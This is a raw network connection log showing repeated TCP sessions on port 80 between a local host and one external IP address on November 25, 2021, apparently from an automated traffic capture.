Nov 25, 2021 10:50:06.261234045 CET	80	50069	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.284095049 CET	80	50069	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.284156084 CET	80	50069	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.284485102 CET	50069	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:06.284516096 CET	50069	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:06.317903042 CET	80	50069	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.635370016 CET	50070	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:06.669143915 CET	80	50070	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.669354916 CET	50070	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:06.671276093 CET	50070	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:06.705013037 CET	80	50070	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.705171108 CET	50070	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:06.739006042 CET	80	50070	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.754846096 CET	80	50070	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.754899979 CET	80	50070	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:06.755167007 CET	50070	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:06.755220890 CET	50070	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:06.789153099 CET	80	50070	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.154259920 CET	50071	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.187652111 CET	80	50071	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.187901974 CET	50071	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.189424038 CET	50071	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.222749949 CET	80	50071	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.222987890 CET	50071	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.256747007 CET	80	50071	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.292504072 CET	80	50071	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.292560101 CET	80	50071	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.292701960 CET	50071	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.292757988 CET	50071	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.326478004 CET	80	50071	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.664045095 CET	50072	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.697565079 CET	80	50072	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.697729111 CET	50072	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.699299097 CET	50072	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.732742071 CET	80	50072	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.733006954 CET	50072	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.766448975 CET	80	50072	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.791333914 CET	80	50072	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.791383028 CET	80	50072	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:07.791559935 CET	50072	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.791608095 CET	50072	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:07.825093985 CET	80	50072	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.166172028 CET	50073	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.200298071 CET	80	50073	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.200529099 CET	50073	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.201999903 CET	50073	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.235981941 CET	80	50073	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.236202002 CET	50073	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.270231009 CET	80	50073	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.296416998 CET	80	50073	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.296492100 CET	80	50073	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.296703100 CET	50073	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.296761990 CET	50073	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.330859900 CET	80	50073	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.669944048 CET	50074	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.704946995 CET	80	50074	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.705185890 CET	50074	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.706878901 CET	50074	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.740907907 CET	80	50074	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.741132021 CET	50074	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.775145054 CET	80	50074	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.799254894 CET	80	50074	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.799304962 CET	80	50074	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:08.799664021 CET	50074	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.799722910 CET	50074	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:08.833854914 CET	80	50074	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.187674999 CET	50075	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.221026897 CET	80	50075	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.221250057 CET	50075	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.222779989 CET	50075	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.255953074 CET	80	50075	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.256258965 CET	50075	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.289663076 CET	80	50075	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.311629057 CET	80	50075	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.311682940 CET	80	50075	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.311908960 CET	50075	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.311965942 CET	50075	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.345412970 CET	80	50075	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.638536930 CET	50076	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.672324896 CET	80	50076	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.672554970 CET	50076	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.674115896 CET	50076	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.707988024 CET	80	50076	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.708259106 CET	50076	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.742450953 CET	80	50076	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.757879019 CET	80	50076	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.757942915 CET	80	50076	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:09.758117914 CET	50076	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.758181095 CET	50076	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:09.792227030 CET	80	50076	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.153079987 CET	50077	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.186614037 CET	80	50077	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.186835051 CET	50077	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.188350916 CET	50077	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.221652031 CET	80	50077	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.221869946 CET	50077	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.255351067 CET	80	50077	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.274288893 CET	80	50077	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.274354935 CET	80	50077	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.274535894 CET	50077	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.274627924 CET	50077	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.308224916 CET	80	50077	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.668390989 CET	50078	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.701750994 CET	80	50078	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.702002048 CET	50078	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.703556061 CET	50078	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.737018108 CET	80	50078	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.737229109 CET	50078	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.770735979 CET	80	50078	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.788405895 CET	80	50078	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.788470984 CET	80	50078	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:10.788675070 CET	50078	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.788779974 CET	50078	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:10.822367907 CET	80	50078	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.169177055 CET	50079	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.203212976 CET	80	50079	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.203434944 CET	50079	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.205022097 CET	50079	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.239061117 CET	80	50079	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.239279032 CET	50079	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.273456097 CET	80	50079	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.291445017 CET	80	50079	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.291508913 CET	80	50079	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.291652918 CET	50079	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.291714907 CET	50079	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.326054096 CET	80	50079	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.679158926 CET	50080	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.712565899 CET	80	50080	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.712790966 CET	50080	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.714368105 CET	50080	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.747783899 CET	80	50080	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.748078108 CET	50080	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.781496048 CET	80	50080	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.797611952 CET	80	50080	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.797667980 CET	80	50080	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:11.797836065 CET	50080	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.797894001 CET	50080	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:11.831337929 CET	80	50080	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.190531969 CET	50081	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.224329948 CET	80	50081	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.224539995 CET	50081	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.226092100 CET	50081	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.259782076 CET	80	50081	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.260006905 CET	50081	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.293817043 CET	80	50081	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.310113907 CET	80	50081	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.310122013 CET	80	50081	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.310350895 CET	50081	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.310360909 CET	50081	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.344139099 CET	80	50081	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.670845985 CET	50082	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.704936028 CET	80	50082	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.705200911 CET	50082	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.706710100 CET	50082	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.740716934 CET	80	50082	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.740931034 CET	50082	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.775166035 CET	80	50082	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.797348022 CET	80	50082	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.797411919 CET	80	50082	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:12.797560930 CET	50082	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.797632933 CET	50082	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:12.831933022 CET	80	50082	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.179730892 CET	50083	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.213876963 CET	80	50083	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.214178085 CET	50083	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.215744972 CET	50083	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.249787092 CET	80	50083	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.250005007 CET	50083	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.284065962 CET	80	50083	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.300825119 CET	80	50083	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.300873995 CET	80	50083	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.301105022 CET	50083	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.301155090 CET	50083	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.335216045 CET	80	50083	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.678941011 CET	50084	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.713021040 CET	80	50084	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.713287115 CET	50084	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.714873075 CET	50084	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.749190092 CET	80	50084	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.749361038 CET	50084	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.783595085 CET	80	50084	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.806813955 CET	80	50084	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.806878090 CET	80	50084	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:13.807065010 CET	50084	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.807128906 CET	50084	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:13.841383934 CET	80	50084	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.164325953 CET	50085	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.197757006 CET	80	50085	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.197995901 CET	50085	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.199511051 CET	50085	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.233015060 CET	80	50085	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.233372927 CET	50085	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.266922951 CET	80	50085	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.290170908 CET	80	50085	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.290191889 CET	80	50085	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.290396929 CET	50085	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.290414095 CET	50085	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.323841095 CET	80	50085	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.607764006 CET	50086	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.641648054 CET	80	50086	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.642119884 CET	50086	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.643841982 CET	50086	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.677700043 CET	80	50086	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.678226948 CET	50086	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.712009907 CET	80	50086	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.729454994 CET	80	50086	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.729474068 CET	80	50086	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:14.729935884 CET	50086	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.729953051 CET	50086	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:14.763761997 CET	80	50086	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.111284018 CET	50087	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.144377947 CET	80	50087	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.144541979 CET	50087	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.146123886 CET	50087	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.179219007 CET	80	50087	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.179420948 CET	50087	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.212624073 CET	80	50087	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.229315996 CET	80	50087	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.229365110 CET	80	50087	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.229561090 CET	50087	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.229612112 CET	50087	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.263020039 CET	80	50087	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.618213892 CET	50088	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.651582003 CET	80	50088	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.651797056 CET	50088	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.653331041 CET	50088	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.686646938 CET	80	50088	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.687103987 CET	50088	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.720437050 CET	80	50088	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.736463070 CET	80	50088	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.736512899 CET	80	50088	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:15.736726046 CET	50088	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.736773968 CET	50088	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:15.770328045 CET	80	50088	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.131187916 CET	50089	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.164665937 CET	80	50089	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.164956093 CET	50089	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.166461945 CET	50089	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.199960947 CET	80	50089	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.200181961 CET	50089	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.233536959 CET	80	50089	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.252347946 CET	80	50089	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.252405882 CET	80	50089	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.252640009 CET	50089	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.252703905 CET	50089	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.286142111 CET	80	50089	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.651170969 CET	50090	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.684820890 CET	80	50090	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.685053110 CET	50090	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.686570883 CET	50090	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.719908953 CET	80	50090	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.720089912 CET	50090	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.753501892 CET	80	50090	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.771271944 CET	80	50090	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.771325111 CET	80	50090	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:16.771527052 CET	50090	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.771579027 CET	50090	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:16.805224895 CET	80	50090	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.159257889 CET	50091	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.193331957 CET	80	50091	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.193605900 CET	50091	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.195199013 CET	50091	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.229352951 CET	80	50091	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.229708910 CET	50091	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.263840914 CET	80	50091	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.283452988 CET	80	50091	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.283509016 CET	80	50091	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.283778906 CET	50091	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.283883095 CET	50091	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.318152905 CET	80	50091	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.603620052 CET	50092	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.636710882 CET	80	50092	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.636868954 CET	50092	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.638428926 CET	50092	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.671533108 CET	80	50092	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.671746016 CET	50092	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.704971075 CET	80	50092	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.720838070 CET	80	50092	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.720886946 CET	80	50092	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:17.721129894 CET	50092	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.721191883 CET	50092	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:17.754679918 CET	80	50092	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.123151064 CET	50093	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.157263994 CET	80	50093	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.157433987 CET	50093	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.158986092 CET	50093	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.192970991 CET	80	50093	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.193180084 CET	50093	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.227191925 CET	80	50093	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.244380951 CET	80	50093	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.244427919 CET	80	50093	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.244571924 CET	50093	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.244620085 CET	50093	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.278912067 CET	80	50093	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.637836933 CET	50094	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.671947956 CET	80	50094	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.672132969 CET	50094	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.673645020 CET	50094	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.707504034 CET	80	50094	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.707741976 CET	50094	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.741614103 CET	80	50094	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.757035971 CET	80	50094	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.757045031 CET	80	50094	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:18.757234097 CET	50094	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.757246971 CET	50094	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:18.791356087 CET	80	50094	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.149075985 CET	50095	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.182465076 CET	80	50095	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.182665110 CET	50095	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.184221983 CET	50095	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.217591047 CET	80	50095	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.217792988 CET	50095	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.251142979 CET	80	50095	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.270900965 CET	80	50095	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.270956993 CET	80	50095	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.271238089 CET	50095	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.271321058 CET	50095	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.304815054 CET	80	50095	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.649678946 CET	50096	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.683896065 CET	80	50096	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.684123039 CET	50096	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.685636044 CET	50096	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.719715118 CET	80	50096	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.719994068 CET	50096	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.754077911 CET	80	50096	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.776088953 CET	80	50096	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.776140928 CET	80	50096	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:19.776454926 CET	50096	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.776536942 CET	50096	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:19.810750961 CET	80	50096	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.171751976 CET	50097	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.205296993 CET	80	50097	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.205508947 CET	50097	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.207252979 CET	50097	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.240813971 CET	80	50097	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.241003990 CET	50097	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.274458885 CET	80	50097	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.294841051 CET	80	50097	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.294898987 CET	80	50097	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.295106888 CET	50097	80	192.168.11.20	176.223.209.128
